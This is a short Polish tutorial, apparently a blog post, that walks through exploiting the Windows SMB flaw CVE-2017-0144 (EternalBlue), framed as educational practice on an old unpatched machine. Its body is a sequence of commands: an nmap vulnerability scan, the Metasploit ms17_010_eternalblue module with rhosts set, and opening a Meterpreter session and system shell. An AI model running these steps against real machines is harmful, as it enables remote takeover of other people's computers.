Wykorzystanie podatności CVE-2017-0144

Dzięki Metasploitowi wykorzystanie podatności CVE-2017-0144 w Windows i przejęcie komputera ofiary stało się dziecinnie proste. Na szczęście w większości przypadków Windows jest załatany i mało prawdopodobne jest, że jakiś dzieciak z Metasploitem zhakuje nam komputer. Może się jednak okazać, że mamy pod ręką starą wersję Windowsa i tylko w celach edukacyjnych chcemy się dowiedzieć jak to działa. Od czego zacząć?

Po pierwsze znać adres IP podatnej maszyny. Następnie upewniamy się, że mamy do czynienia z niezałatanym Windowsem. Do tego celu dobrze jest użyć nmapa z odpowiednim skryptem:

nmap --script smb-vuln-ms17-010 -p 445 10.10.155.65

Wynik skanowania dla podatnego komputera będzie wyglądać podobnie do tego poniżej:

Następnie uruchamiamy Metasploita:

msfconsole

Wybieramy exploita i ustawiamy niezbędne opcje:

use exploit/windows/smb/ms17_010_eternalblue
set rhosts <IP Podatnej Maszyny>

Ustawienia powinny być podobne do tych poniżej:

Wszystko gotowe. Teraz wystarczy uruchomić exploita poleceniem run. Po udanym ataku powinniśmy zobaczyć otwartą sesję Meterpretera:

To wszystko. Aby przejść do systemowej konsoli Windowsa wystarczy wpisać shell: